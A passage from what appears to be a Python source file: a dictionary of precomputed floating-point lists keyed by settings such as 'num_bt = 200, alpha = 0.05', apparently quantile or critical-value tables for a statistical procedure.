0.8969194030761675, 0.8979932250976518, 0.8990676574706985, 0.9001427001953078, 0.9012183532714797, 0.9022945556640579, 0.9033714294433547, 0.9044489135742141, 0.9055270690917921, 0.9066058349609326, 0.9076853332519482, 0.9087654418945262, 0.9098462829589792, 0.910927795410151, 0.9120100402831978, 0.9130929565429634, 0.9141766662597602, 0.9152611694335884, 0.9163464050292917, 0.9174323730468698, 0.9185191955566353, 0.9196068725585883, 0.9206953430175725, 0.9217846679687444, 0.9228748474121037, 0.9239659423828069, 0.9250579528808539, 0.9261508789062446, 0.927244720458979, 0.9283395996093696, 0.9294354553222602, 0.9305323486328071, 0.9316302795410102, 0.9327292480468697, 0.933829376220698, 0.9349306030273384, 0.9360329895019478, 0.9371365966796822, 0.9382414245605416, 0.9393475341796821, 0.9404549255371039, 0.9415635986328069, 0.9426737365722601, 0.943785278320307, 0.9448982849121038, 0.946012817382807, 0.9471288757324162, 0.9482465820312442, 0.9493659973144474, 0.9504871215820254, 0.9516100769042911, 0.9527348632812441, 0.9538616638183534, 0.954990478515619, 0.9561213684081972, 0.9572545166015566, 0.958389923095697, 0.9595277709960878, 0.9606681213378846, 0.9618111572265564, 0.9629569396972596, 0.9641056518554628, 0.9652574768066347, 0.966412597656244, 0.9675711364746035, 0.9687333984374941, 0.9698995056152283, 0.9710698852539001, 0.9722447204589783, 0.9734243774414001, 0.9746092224121033, 0.9757997436523377, 0.9769964294433534, 0.9781998901367127, 0.9794107360839782, 0.9806298217773376, 0.9818581237792906, 0.9830968017578062, 0.9843474426269468, 0.9856117553710874, 0.9868923034667906, 0.988192199707025, 0.9895158996581969, 0.9908700561523373, 0.9922647399902279, 0.9937177124023372, 0.9952649841308528, 0.9970087280273371], # skipcq: FLK-E501 'num_bt = 1000, alpha = 0.025': [2.5299072265625002e-05, 0.00024230957031250004, 0.0006191101074218749, 0.0010908813476562499, 0.0016253967285156249, 0.0022049560546874994, 0.002818878173828124, 0.0034599609374999984, 0.004123382568359373, 0.004805480957031248, 0.005503570556640623, 0.006215515136718748, 0.006939605712890622, 0.007674499511718747, 0.008419036865234372, 0.009172302246093746, 0.00993350219726562, 0.010701965332031247, 0.011477020263671874, 0.01225823974609375, 0.013045196533203126, 0.013837402343750003, 0.014634552001953127, 0.015436401367187505, 0.01624252319335938, 0.01705279541015626, 0.017866912841796888, 0.018684692382812514, 0.01950595092773439, 0.020330505371093766, 0.021158172607421893, 0.02198883056640627, 0.022822357177734398, 0.023658630371093774, 0.0244975280761719, 0.025338928222656272, 0.0261827087402344, 0.02702880859375003, 0.027877166748046904, 0.028727600097656278, 0.029580169677734407, 0.03043469238281253, 0.03129116821289066, 0.03214947509765629, 0.03300961303710941, 0.033871520996093786, 0.03473507690429691, 0.03560028076171879, 0.03646707153320316, 0.03733538818359378, 0.038205230712890656, 0.039076538085937536, 0.03994924926757815, 0.04082336425781253, 0.0416988220214844, 0.04257556152343753, 0.0434535827636719, 0.04433288574218753, 0.04521334838867191, 0.046095031738281285, 0.04697787475585941, 0.04786187744140629, 0.048746917724609415, 0.04963311767578129, 0.05052029418945316, 0.051408569335937536, 0.052297821044921915, 0.05318811035156253, 0.05407931518554691, 0.054971496582031286, 0.055864654541015656, 0.05675866699218753, 0.057653594970703166, 0.05854943847656254, 0.05944613647460942, 0.06034368896484379, 0.06124203491210941, 0.06214123535156253, 0.06304122924804689, 0.06394195556640625, 0.06484353637695311, 0.06574584960937499, 0.06664895629882814, 0.067552734375, 0.06845730590820315, 0.06936254882812501, 0.07026846313476565, 0.07117510986328127, 0.0720824890136719, 0.07299047851562504, 0.07389913940429693, 0.07480847167968757, 0.0757184143066407, 0.07662896728515634, 0.0775401916503907, 0.07845202636718757, 0.07936447143554692, 0.0802775268554688, 0.08119113159179692, 0.08210534667968755, 0.08302011108398444, 0.08393548583984381, 0.08485134887695317, 0.08576782226562504, 0.08668484497070317, 0.08760235595703128, 0.08852041625976564, 0.08943902587890629, 0.09035812377929692, 0.0912777709960938, 0.09219790649414067, 0.09311853027343756, 0.09403964233398443, 0.09496130371093756, 0.09588339233398444, 0.0968059692382813, 0.09772897338867192, 0.0986525268554688, 0.09957650756835942, 0.1005009155273438, 0.10142581176757817, 0.1023511352539063, 0.10327688598632817, 0.10420312500000006, 0.10512979125976571, 0.10605682373046885, 0.10698434448242197, 0.10791223144531262, 0.10884054565429699, 0.10976928710937511, 0.11069845581054699, 0.11162799072265636, 0.11255795288085949, 0.11348828125000013, 0.1144190368652345, 0.11535015869140638, 0.11628170776367203, 0.1172135620117189, 0.11814584350585955, 0.11907849121093769, 0.12001150512695333, 0.12094488525390645, 0.1218786315917971, 0.12281274414062524, 0.12374722290039086, 0.12468206787109398, 0.1256172180175784, 0.1265527343750003, 0.12748861694335972, 0.12842480468750034, 0.12936135864257847, 0.13029827880859407, 0.13123544311523466, 0.13217303466796904, 0.13311093139648467, 0.13404913330078155, 0.1349876403808597, 0.1359265136718753, 0.13686569213867217, 0.1378051757812503, 0.13874496459960967, 0.1396851196289065, 0.1406255187988284, 0.1415662841796878, 0.1425072937011722, 0.14344866943359408, 0.14439028930664094, 0.14533227539062532, 0.1462745056152347, 0.14721704101562533, 0.14815982055664095, 0.1491029663085941, 0.15004635620117224, 0.15099005126953163, 0.15193405151367223, 0.15287829589843788, 0.15382284545898478, 0.15476763916015668, 0.15571273803710983, 0.15665808105468798, 0.1576037292480474, 0.158549682617188, 0.1594958190917974, 0.16044226074218804, 0.16138900756835994, 0.16233599853515684, 0.16328323364257874, 0.16423071289062563, 0.16517849731445378, 0.16612652587890692, 0.16707479858398505, 0.16802331542968818, 0.1689720764160163, 0.16992114257812568, 0.17087045288086006, 0.17181994628906322, 0.17276974487304764, 0.17371978759765705, 0.17467007446289146, 0.1756205444335946, 0.176571319580079, 0.17752233886718838, 0.17847360229492276, 0.17942504882812588, 0.180376739501954, 0.18132873535156335, 0.18228091430664145, 0.1832333374023446, 0.18418594360351648, 0.1851388549804696, 0.18609194946289148, 0.18704528808593834, 0.1879988708496102, 0.1889526367187508, 0.18990664672851643, 0.19086090087890706, 0.19181533813476648, 0.1927700195312509, 0.1937249450683603, 0.19468005371093844, 0.1956353454589853, 0.19659094238281344, 0.1975467224121103, 0.19850268554687595, 0.1994588928222666, 0.20041528320312602, 0.20137191772461044, 0.2023287353515636, 0.20328579711914174, 0.20424304199218862, 0.20520046997070424, 0.20615814208984484, 0.20711599731445424, 0.20807409667968862, 0.2090323791503918, 0.2099908447265637, 0.21094949340820435, 0.21190838623046998, 0.2128674621582044, 0.21382678222656382, 0.21478628540039196, 0.21574591064453258, 0.21670584106445445, 0.21766589355468885, 0.21862612915039198, 0.2195866088867201, 0.22054727172851696, 0.2215081176757826, 0.22246914672851698, 0.2234304199218764, 0.2243918151855483, 0.22535345458984518, 0.2263152770996108, 0.22727722167968895, 0.22823941040039208, 0.22920178222656395, 0.23016433715820456, 0.23112707519531395, 0.23208999633789207, 0.23305310058593892, 0.2340163879394545, 0.23497985839843888, 0.23594351196289198, 0.23690734863281387, 0.2378713684082045, 0.2388355712890639, 0.23979995727539205, 0.24076452636718892, 0.24172921752929832, 0.24269415283203272, 0.24365921020507958, 0.24462451171875144, 0.24558993530273582, 0.24655554199218893, 0.24752133178711083, 0.24848730468750146, 0.24945346069336088, 0.2504197387695327, 0.25138626098632966, 0.252352905273439, 0.25331973266601715, 0.2542866821289078, 0.2552538757324234, 0.25622119140625155, 0.25718869018554846, 0.25815637207031406, 0.25912417602539217, 0.26009222412109523, 0.2610603942871108, 0.2620286865234389, 0.26299722290039207, 0.26396588134765775, 0.2649347229003921, 0.265903686523439, 0.2668728942871109, 0.2678422241210954, 0.26881167602539235, 0.269781311035158, 0.27075112915039246, 0.2717211303710956, 0.2726912536621112, 0.27366156005859565, 0.2746319885253926, 0.27560260009765825, 0.27657339477539267, 0.2775443115234396, 0.27851541137695524, 0.2794866333007834, 0.2804580383300803, 0.28142956542968967, 0.2824012756347678, 0.2833731689453147, 0.28434518432617406, 0.2853173828125022, 0.28628970336914283, 0.28726220703125216, 0.288234832763674, 0.28920764160156465, 0.29018063354492396, 0.29115368652343954, 0.29212698364258016, 0.2931004028320332, 0.29407394409179877, 0.2950476684570331, 0.29602151489258, 0.29699554443359555, 0.2979696960449236, 0.2989440307617205, 0.2999184875488299, 0.3008930664062518, 0.3018678283691424, 0.30284277343750177, 0.3038177795410174, 0.3047930297851581, 0.30576834106445505, 0.3067438354492207, 0.3077195129394551, 0.30869531250000204, 0.3096712341308614, 0.31064733886718954, 0.3116235656738302, 0.3125999145507833, 0.31357644653320516, 0.31455310058593955, 0.3155299377441426, 0.3165068969726582, 0.31748397827148633, 0.31846124267578324, 0.3194385681152363, 0.3204161376953144, 0.3213937683105488, 0.3223715820312518, 0.32334957885742366, 0.32432763671875176, 0.32530587768554864, 0.32628424072265805, 0.32726278686523613, 0.32824145507812674, 0.3292202453613299, 0.33019915771484554, 0.33117825317383, 0.33215747070312696, 0.33313681030273634, 0.3341163330078145, 0.3350959777832052, 0.3360757446289083, 0.33705563354492396, 0.3380357055664084, 0.33901589965820533, 0.3399962158203147, 0.34097671508789285, 0.34195727539062726, 0.34293801879883035, 0.34391888427734596, 0.34489993286133036, 0.345881042480471, 0.34686233520508036, 0.3478437500000022, 0.3488253479003929, 0.3498070068359398, 0.3507888488769554, 0.3517708129882835, 0.35275289916992414, 0.3537351074218773, 0.35471749877929926, 0.3557000122070336, 0.3566826477050805, 0.35766540527343993, 0.35864828491211187, 0.3596313476562526, 0.36061453247070574, 0.3615978393554714, 0.3625812683105496, 0.3635648193359403, 0.36454849243164344, 0.36553234863281536, 0.3665163269042998, 0.3675004272460968, 0.36848464965820615, 0.36946899414062806, 0.3704534606933625, 0.3714381103515656, 0.37242288208008123, 0.3734077148437531, 0.3743927307128938, 0.37537792968750316, 0.3763631896972688, 0.37734857177734693, 0.37833413696289386, 0.37931976318359695, 0.3803055725097688, 0.3812915039062532, 0.38227755737305014, 0.3832637329101596, 0.3842500915527377, 0.3852365112304721, 0.38622311401367526, 0.3872097778320347, 0.3881966247558629, 0.38918359375000366, 0.3901706848144568, 0.3911578979492225, 0.3921452331543007, 0.39313269042969146, 0.39412033081055087, 0.39510803222656654, 0.396095916748051, 0.397083923339848, 0.3980719909668011, 0.39906024169922305, 0.4000486145019575, 0.4010371093750045, 0.40202572631836386, 0.4030144653320358, 0.4040033874511765, 0.40499237060547344, 0.4059815368652391, 0.406970764160161, 0.40796017456055167, 0.4089496459960986, 0.40993930053711425, 0.4109290771484424, 0.4119189758300831, 0.41290899658203617, 0.4138991394043018, 0.4148894042968799, 0.4158797912597706, 0.4168703002929737, 0.4178609313964893, 0.4188516845703174, 0.4198426208496143, 0.4208336181640674, 0.42182479858398925, 0.42281604003906736, 0.42380746459961427, 0.4247989501953173, 0.42579061889648917, 0.42678240966797354, 0.42777432250977043, 0.4287662963867236, 0.42975845336914553, 0.4307507324218799, 0.43174313354492677, 0.4327356567382862, 0.4337283020019581, 0.43472106933594257, 0.43571395874023955, 0.43670697021484894, 0.4377001647949271, 0.43869342041016157, 0.43968679809570854, 0.4406802978515679, 0.4416739807128961, 0.44266772460938053, 0.44366165161133364, 0.444655639648443, 0.4456498107910212, 0.4466440429687556, 0.4476384582519587, 0.44863293457031805, 0.4496275939941462, 0.4506223144531306, 0.4516172180175837, 0.4526122436523493, 0.4536073303222712, 0.45460260009766185, 0.4555979919433649, 0.4565935058593805, 0.45758914184570865, 0.4585848999023493, 0.4595807189941462, 0.4605767211914118, 0.4615728454589899, 0.46256909179688055, 0.4635654602050836, 0.4645619506835992, 0.4655585632324273, 0.4665552978515679, 0.4675522155761772, 0.4685491943359428, 0.46954629516602087, 0.4705435180664115, 0.4715408630371145, 0.47253833007813006, 0.4735359802246144, 0.474533691406255, 0.47553152465820814, 0.47652954101563005, 0.4775276184082081, 0.4785258178710987, 0.4795242004394581, 0.48052264404297373, 0.48152127075195816, 0.48251995849609886, 0.4835188293457082, 0.48451776123047385, 0.48551687622070827, 0.4865161132812552, 0.4875154113769583, 0.4885148925781302, 0.4895144958496146, 0.49051416015625526, 0.4915140075683646, 0.4925139770507865, 0.4935140686035209, 0.4945142822265678, 0.49551455688477086, 0.4965150146484427, 0.4975155944824271, 0.498516296386724, 0.49951712036133333, 0.5005180664062553, 0.5015191955566459, 0.5025203857421928, 0.5035216979980522, 0.5045231323242241, 0.5055246887207084, 0.5065264282226615, 0.5075282287597708, 0.5085302124023489, 0.5095322570800832, 0.5105344238281301, 0.5115367736816457, 0.5125392456054738, 0.5135417785644582, 0.5145444946289112, 0.5155473327636767, 0.5165502319335985, 0.5175533142089891, 0.5185565185546922, 0.5195598449707078, 0.520563293457036, 0.5215668640136767, 0.5225705566406299, 0.5235744323730518, 0.5245783691406299, 0.5255824279785205, 0.5265866699218799, 0.5275909729003955, 0.5285954589843799, 0.5296000061035205, 0.53060473632813, 0.531609588623052, 0.5326145019531302, 0.5336195983886772, 0.5346248168945368, 0.5356301574707087, 0.536635620117193, 0.5376412658691462, 0.5386469726562556, 0.5396528015136776, 0.5406588134765683, 0.5416648864746153, 0.5426711425781311, 0.5436775207519593, 0.5446839599609435, 0.5456905822753967, 0.5466973266601624, 0.5477042541503968, 0.5487112426757875, 0.5497183532714908, 0.5507256469726627, 0.5517330017089908, 0.5527405395507875, 0.5537481994628969, 0.5547559204101625, 0.555763824462897, 0.5567719116211002, 0.5577800598144597, 0.5587883300781316, 0.559796783447272, 0.5608052978515689, 0.5618139953613345, 0.5628228149414126, 0.5638317565918033, 0.5648408203125065, 0.5658500671386784, 0.5668593750000064, 0.5678688659668031, 0.5688784179687562, 0.569888153076178, 0.5708980102539124, 0.5719080505371156, 0.572918151855475, 0.5739284362793031, 0.5749387817382873, 0.5759493103027403, 0.5769599609375059, 0.5779707946777403, 0.5789816894531309, 0.5799927673339903, 0.581003906250006, 0.5820152282714902, 0.583026672363287, 0.5840382995605525, 0.5850499877929743, 0.586061859130865, 0.5870738525390681, 0.5880859680175837, 0.5890982055664118, 0.5901106262207086, 0.5911231689453179, 0.5921358337402397, 0.593148620605474, 0.5941615905761771, 0.5951746215820365, 0.5961878356933645, 0.5972011718750051, 0.5982146911621143, 0.5992282714843798, 0.6002420349121141, 0.601255920410161, 0.6022699890136766, 0.6032841186523483, 0.6042984313964889, 0.6053128662109418, 0.6063274841308636, 0.6073422241210978, 0.6083570861816446, 0.609372070312504, 0.6103872375488321, 0.6114024658203164, 0.6124179382324259, 0.6134334716796915, 0.6144491882324258, 0.6154650268554726, 0.6164809875488318, 0.6174971313476599, 0.6185133972168005, 0.6195297851562537, 0.6205463562011756, 0.62156304931641, 0.622579864501957, 0.6235968627929728, 0.624613983154301, 0.6256312866210977, 0.6266486511230508, 0.627666259765629, 0.6286839294433634, 0.6297017822265666, 0.6307197570800823, 0.6317379150390666, 0.6327561950683634, 0.6337745971679728, 0.6347931823730509, 0.6358118896484416, 0.636830780029301, 0.6378497924804729, 0.6388689880371136, 0.6398882446289104, 0.6409077453613322, 0.6419273681640666, 0.6429471130371135, 0.6439670410156292, 0.6449870910644573, 0.6460072631835979, 0.6470276184082072, 0.6480481567382853, 0.6490688171386759, 0.6500895996093791, 0.6511105651855509, 0.6521317138671915, 0.6531529846191445, 0.65417437744141, 0.6551959533691444, 0.6562177124023475, 0.6572395935058631, 0.6582615966796912, 0.6592838439941443, 0.6603061523437536, 0.6613287048339879, 0.6623513183593784, 0.6633741760253941, 0.6643971557617221, 0.6654202575683626, 0.6664435424804719, 0.6674670104980499, 0.6684906005859405, 0.6695143737792998, 0.6705383300781278, 0.6715624084472683, 0.6725866699218775, 0.6736110534667993, 0.6746356201171898, 0.6756603698730491, 0.6766853027343771, 0.6777103576660176, 0.6787355957031268, 0.6797609558105485, 0.680786499023439, 0.6818122253417983, 0.6828381347656263, 0.6838641662597668, 0.6848903808593759, 0.6859167785644539, 0.6869432983398444, 0.6879700622558599, 0.6889969482421879, 0.6900239562988285, 0.6910512084960941, 0.6920785827636722, 0.6931062011718753, 0.6941339416503908, 0.6951618652343751, 0.6961899108886719, 0.6972182006835937, 0.6982466125488281, 0.6992752075195313, 0.7003039855957032, 0.7013329467773438, 0.7023620910644531, 0.7033914184570312, 0.7044208679199219, 0.7054505615234375, 0.7064804382324218, 0.7075104370117186, 0.7085406188964841, 0.7095710449218747, 0.7106015930175779, 0.7116323242187497, 0.7126632995605465, 0.7136943969726558, 0.7147256774902339, 0.7157571411132807, 0.7167888488769525, 0.7178206787109368, 0.718852752685546, 0.7198849487304678, 0.7209173889160146, 0.7219500122070303, 0.7229828186035144, 0.7240158081054674, 0.7250489807128891, 0.7260823364257797, 0.727115875244139, 0.7281496582031232, 0.7291836242675761, 0.7302177734374978, 0.7312521057128883, 0.7322866210937476, 0.733321380615232, 0.7343563232421851, 0.735391448974607, 0.7364268188476538, 0.7374623107910131, 0.7384980468749974, 0.7395340270996068, 0.740570190429685, 0.7416065368652319, 0.7426430664062477, 0.7436798400878882, 0.7447167968749976, 0.745753997802732, 0.7467913818359352, 0.7478290100097633, 0.7488668212890602, 0.7499048156738258, 0.7509430541992165, 0.7519815368652322, 0.7530202026367164, 0.7540591125488257, 0.7550982055664038, 0.756137542724607, 0.7571770629882788, 0.7582168273925757, 0.7592568359374975, 0.7602970275878881, 0.7613374633789037, 0.7623781433105442, 0.7634190063476535, 0.7644601135253878, 0.7655014648437471, 0.7665430603027313, 0.7675848388671843, 0.7686269226074186, 0.7696691894531217, 0.7707117004394498, 0.7717543945312467, 0.7727973937988248, 0.773840637207028, 0.7748840637206998, 0.775927795410153, 0.7769717712402312, 0.7780159301757782, 0.7790603942871064, 0.7801050415039031, 0.7811499938964813, 0.7821951904296846, 0.7832406311035127, 0.7842863159179657, 0.7853322448730439, 0.7863784790039033, 0.7874248962402315, 0.7884716186523409, 0.7895186462402316, 0.790565856933591, 0.7916133728027316, 0.7926611328124972, 0.7937091979980441, 0.7947575073242159, 0.7958060607910128, 0.7968549194335909, 0.7979040832519503, 0.7989534912109345, 0.8000032043457, 0.8010531616210906, 0.8021033630371063, 0.8031539306640595, 0.8042047424316376, 0.8052558593749971, 0.8063072814941378, 0.8073589477539035, 0.8084109191894505, 0.8094631958007787, 0.8105157775878881, 0.8115686645507788, 0.8126218566894508, 0.8136753540039038, 0.8147291564941382, 0.815783264160154, 0.8168376770019509, 0.817892395019529, 0.8189474182128885, 0.8200028076171854, 0.8210585021972635, 0.822114501953123, 0.8231708679199198, 0.8242275390624979, 0.8252845153808573, 0.8263418579101541, 0.8273995666503885, 0.8284575805664042, 0.8295158996582009, 0.8305746459960915, 0.8316336975097633, 0.8326930541992165, 0.8337528381347633, 0.8348129882812475, 0.835873443603513, 0.8369342651367161, 0.8379955139160128, 0.8390570678710908, 0.8401190490722626, 0.8411813964843721, 0.8422441101074188, 0.8433071899414032, 0.8443706970214814, 0.8454345703124971, 0.8464988098144502, 0.8475634765624972, 0.8486285705566378, 0.8496940917968722, 0.850759979248044, 0.8518262939453097, 0.8528930358886692, 0.8539602050781222, 0.8550277404785128, 0.8560957641601533, 0.8571642150878876, 0.8582331542968719, 0.8593024597167936, 0.8603722534179654, 0.8614425354003873, 0.8625132446289029, 0.8635844421386684, 0.8646560668945277, 0.8657282409667931, 0.8668008422851524, 0.8678739318847616, 0.8689475097656209, 0.8700216369628865, 0.871096252441402, 0.8721713562011676, 0.8732470092773394, 0.8743231506347614, 0.8753998413085895, 0.876477081298824, 0.8775548706054644, 0.878633148193355, 0.879712036132808, 0.8807915344238236, 0.8818715209960891, 0.8829521789550733, 0.8840333862304638, 0.8851151428222607, 0.8861975708007762, 0.8872806091308544, 0.888364257812495, 0.8894485168456981, 0.89053344726562, 0.8916189880371043, 0.8927052612304637, 0.8937921447753855, 0.8948797607421822, 0.8959679870605416, 0.8970570068359321, 0.8981466979980416, 0.899237121582026, 0.9003282775878855, 0.9014202270507762, 0.9025129089355418, 0.9036063842773386, 0.9047005920410105, 0.90579565429687, 0.9068915710449169, 0.907988281249995, 0.9090858459472607, 0.9101842651367139, 0.9112835388183546, 0.9123837890624952, 0.9134848937988234, 0.9145869750976514, 0.9156899719238232, 0.9167939453124949, 0.917898956298823, 0.9190049438476511, 0.9201119689941354, 0.9212200317382758, 0.9223292541503852, 0.9234395141601509, 0.9245509338378853, 0.9256635131835885, 0.9267772521972604, 0.9278922729492135, 0.9290085144042916, 0.9301259765624946, 0.9312448425292913, 0.9323649902343693, 0.933486541748041, 0.9346094970703066, 0.9357339172363223, 0.936859863281244, 0.9379873962402282, 0.9391164550781187, 0.940247161865228, 0.9413795776367123, 0.942513763427728, 0.9436497192382748, 0.9447875671386655, 0.9459273071288999, 0.9470690612792906, 0.9482128906249937, 0.9493588562011657, 0.9505070800781187, 0.9516576232910093, 0.9528105468749936, 0.9539660339355404, 0.9551240844726497, 0.9562849426269465, 0.9574486083984307, 0.9586152648925711, 0.9597850952148367, 0.960958282470696, 0.9621348876953054, 0.9633151550292897, 0.9644993896484303, 0.9656876525878834, 0.9668803100585867, 0.968077667236321, 0.9692799682617116, 0.9704875793456958, 0.9717009887695238, 0.9729205017089769, 0.9741467285156175, 0.9753802795410081, 0.9766218261718677, 0.9778722229003832, 0.9791323242187425, 0.9804033508300707, 0.9816867675781177, 0.982984222412102, 0.9842979736328051, 0.9856308288574146, 0.9869865722656176, 0.9883705139160083, 0.989790344238274, 0.9912579650878833, 0.9927941894531177, 0.9944410705566334, 0.996317932128899], # skipcq: FLK-E501 'num_bt = 200, alpha = 0.1': [0.0005266952514648437, 0.0026622009277343754, 0.005522804260253907, 0.008751449584960939, 0.012211112976074221, 0.015833129882812498, 0.01957775115966797, 0.023419113159179696, 0.02733966827392579, 0.031326751708984385, 0.03537067413330079, 0.03946403503417971, 0.04360103607177738, 0.047776947021484405, 0.05198780059814457, 0.05623039245605472, 0.060501899719238306, 0.06480010986328127, 0.06912288665771488, 0.07346855163574223, 0.07783550262451176, 0.08222236633300783, 0.08662792205810552, 0.09105125427246098, 0.09549121856689458, 0.09994697570800787, 0.10441783905029303, 0.10890296936035163, 0.11340183258056649, 0.11791374206542979, 0.12243816375732434, 0.12697463989257826, 0.13152271270751967, 0.1360819244384767, 0.14065181732177745, 0.14523216247558604, 0.14982250213623055, 0.15442260742187514, 0.15903209686279313, 0.1636506652832033, 0.168278160095215, 0.17291435241699235, 0.17755886077880872, 0.18221160888671892, 0.1868722915649416, 0.19154083251953144, 0.19621692657470724, 0.20090049743652366, 0.20559139251709008, 0.21028930664062526, 0.21499423980712914, 0.2197060394287112, 0.2244245529174807, 0.2291496276855471, 0.23388118743896508, 0.2386191558837893, 0.24336330413818386, 0.2481136322021487, 0.2528699874877932, 0.25763236999511746, 0.26240062713623075, 0.26717460632324247, 0.27195438385009796, 0.27673973083496123, 0.2815306472778324, 0.2863271331787113, 0.2911289596557621, 0.2959362792968754, 0.30074878692626994, 0.30556663513183635, 0.31038967132568407, 0.3152178192138677, 0.32005115509033255, 0.32488945007324277, 0.3297328567504889, 0.33458114624023505, 0.33943439483642646, 0.3442926025390632, 0.34915561676025453, 0.35402343750000065, 0.35889614105224676, 0.36377349853515695, 0.36865566253662174, 0.37354255676269593, 0.37843410491943424, 0.38333030700683657, 0.3882311630249029, 0.39313659667968803, 0.39804668426513723, 0.40296134948730516, 0.4078805923461919, 0.41280441284179736, 0.4177328109741217, 0.42266563415527403, 0.4276031112670905, 0.4325450134277351, 0.4374914169311531, 0.4424423980712899, 0.44739788055420004, 0.45235778808593835, 0.45732227325439534, 0.4622911834716805, 0.46726467132568444, 0.47224258422851645, 0.4772250747680672, 0.48221199035644613, 0.48720348358154386, 0.492199478149415, 0.49720005035400483, 0.5022051239013681, 0.5072147750854501, 0.5122290039062509, 0.5172478103637705, 0.5222712707519543, 0.5272993087768567, 0.5323320007324233, 0.5373693466186538, 0.5424113464355484, 0.5474580764770525, 0.5525096130371112, 0.5575658798217793, 0.5626268768310567, 0.567692756652834, 0.5727635192871114, 0.5778391647338887, 0.5829196929931661, 0.5880052566528342, 0.5930957794189475, 0.5981914138793967, 0.6032921600341818, 0.6083980178833028, 0.6135090637207052, 0.6186254501342794, 0.6237471008300801, 0.6288740921020528, 0.634006576538088, 0.6391444778442403, 0.6442880249023457, 0.6494372177124044, 0.6545920562744161, 0.6597527694702168, 0.6649192810058613, 0.6700918197631853, 0.6752703857421893, 0.6804551315307634, 0.6856461334228532, 0.690843467712404, 0.6960472869873062, 0.7012576675415054, 0.7064747619628922, 0.711698722839357, 0.7169297027587906, 0.7221677780151383, 0.7274131011962908, 0.7326659011840839, 0.7379263305664081, 0.7431945419311543, 0.7484706878662131, 0.7537550735473655, 0.7590478515625023, 0.7643492507934593, 0.7696595764160179, 0.7749789810180687, 0.7803078460693382, 0.7856464004516623, 0.7909950256347678, 0.7963540267944358, 0.8017237854003927, 0.80710460662842, 0.8124971008300801, 0.8179015731811543, 0.823318634033205, 0.8287487411499042, 0.8341925048828143, 0.8396506118774432, 0.845123825073244, 0.8506128311157246, 0.8561184692382833, 0.8616418838500997, 0.8671839904785177, 0.8727460861206076, 0.8783294677734395, 0.8839356613159199, 0.8895665740966816, 0.8952240371704121, 0.9009105682373066, 0.9066288375854512, 0.9123821258544944, 0.9181743240356468, 0.9240102386474631, 0.9298956680297872, 0.9358380889892599, 0.9418471908569359, 0.9479356384277366, 0.9541212844848657, 0.9604301452636743, 0.9669025039672876, 0.9736086273193385, 0.9806913375854518, 0.9885530853271509], # skipcq: FLK-E501 'num_bt = 200, alpha = 0.05': [0.00025646209716796877, 0.0017797088623046878, 0.004100608825683594, 0.0068597412109375, 0.009901237487792966, 0.013143997192382809, 0.016539649963378908, 0.0200567626953125, 0.023673591613769536, 0.027374267578125014, 0.031146888732910168, 0.03498214721679687, 0.03887271881103515, 0.04281265258789061, 0.046796989440917945, 0.0508216857910156, 0.054883308410644496, 0.05897872924804685, 0.06310550689697261, 0.06726142883300776, 0.07144443511962884, 0.0756529235839843, 0.07988521575927726, 0.08414009094238271, 0.08841632843017569, 0.09271270751953116, 0.09702823638916008, 0.101362075805664, 0.10571338653564448, 0.11008140563964841, 0.11446544647216796, 0.11886489868164063, 0.1232790756225586, 0.12770744323730468, 0.13214962005615233, 0.13660499572753904, 0.14107326507568357, 0.14555389404296878, 0.15004657745361333, 0.154551010131836, 0.15906673431396487, 0.16359352111816405, 0.16813098907470705, 0.17267898559570313, 0.1772372055053711, 0.1818053436279297, 0.18638324737548825, 0.19097068786621088, 0.19556743621826167, 0.20017326354980466, 0.2047880172729492, 0.20941154479980467, 0.21404361724853516, 0.2186841583251953, 0.2233330154418945, 0.22798995971679686, 0.23265491485595705, 0.23732772827148438, 0.2420083236694336, 0.24669654846191408, 0.25139225006103516, 0.25609542846679695, 0.2608059310913086, 0.26552360534667974, 0.2702483749389649, 0.27498023986816417, 0.27971904754638677, 0.28446472167968756, 0.28921718597412116, 0.29397636413574224, 0.29874225616455086, 0.30351470947265635, 0.3082937240600586, 0.3130792236328125, 0.3178710556030273, 0.3226693725585936, 0.3274739456176757, 0.3322847747802734, 0.33710178375244143, 0.341925048828125, 0.3467544174194337, 0.3515898895263674, 0.356431465148926, 0.3612790679931643, 0.36613262176513695, 0.37099212646484403, 0.37585765838623075, 0.3807290649414065, 0.38560634613037126, 0.3904895782470705, 0.3953786087036135, 0.4002734375000002, 0.40517414093017595, 0.4100806427001955, 0.4149929428100588, 0.41991104125976586, 0.42483486175537133, 0.4297644805908206, 0.4346998977661136, 0.43964103698730506, 0.44458789825439493, 0.4495405578613286, 0.45449901580810603, 0.4594631958007818, 0.4644331741333013, 0.4694088745117193, 0.4743904495239264, 0.4793777465820319, 0.48437084197998115, 0.4893698120117194, 0.4943745803833015, 0.49938522338867264, 0.5044017410278328, 0.5094241333007821, 0.5144524765014657, 0.5194866943359384, 0.5245269393920908, 0.5295732116699228, 0.5346254348754893, 0.5396837615966807, 0.5447482681274425, 0.549818801879884, 0.5548955917358409, 0.5599785614013684, 0.5650677871704115, 0.5701633453369155, 0.5752653121948257, 0.5803736877441421, 0.5854884719848648, 0.5906098937988296, 0.595737800598146, 0.6008724212646499, 0.6060138320922865, 0.6111619567871107, 0.6163170242309584, 0.6214789581298841, 0.626647987365724, 0.6318241882324231, 0.6370075607299817, 0.6421982574462901, 0.6473963546752941, 0.652602005004884, 0.6578152847290049, 0.6630363464355478, 0.6682652664184578, 0.6735021209716805, 0.678747215270997, 0.6840005493164072, 0.6892622756958018, 0.6945326232910167, 0.6998117446899426, 0.7050997924804701, 0.7103969955444349, 0.7157034301757828, 0.7210194778442398, 0.7263452148437517, 0.7316809463500995, 0.7370269012451192, 0.7423833084106466, 0.7477504730224629, 0.7531287002563496, 0.7585182952880878, 0.7639195632934588, 0.7693328857421893, 0.7747586441040055, 0.7801972198486344, 0.785649147033693, 0.7911147308349626, 0.796594657897951, 0.8020893096923847, 0.8075993728637716, 0.813125457763674, 0.8186683273315452, 0.824228668212893, 0.8298072433471704, 0.8354051208496118, 0.8410232925415064, 0.8466627502441431, 0.8523247909545921, 0.858010711669924, 0.8637222671508811, 0.8694609832763693, 0.875228843688967, 0.8810282135009788, 0.8868616104125999, 0.8927320098876976, 0.8986429977417016, 0.9045986175537135, 0.9106038284301785, 0.9166648864746121, 0.922789039611819, 0.9289858245849636, 0.9352674484252956, 0.9416502380371119, 0.9481566238403347, 0.9548195648193389, 0.961690254211429, 0.9688574218750032, 0.9765015029907258, 0.9851329803466828], # skipcq: FLK-E501 'num_bt = 200, alpha = 0.025': [0.00012660980224609377, 0.0012133789062500006, 0.0031041336059570313, 0.00547554016113281, 0.00816616058349609, 0.011087417602539059, 0.014185523986816401, 0.017424774169921872, 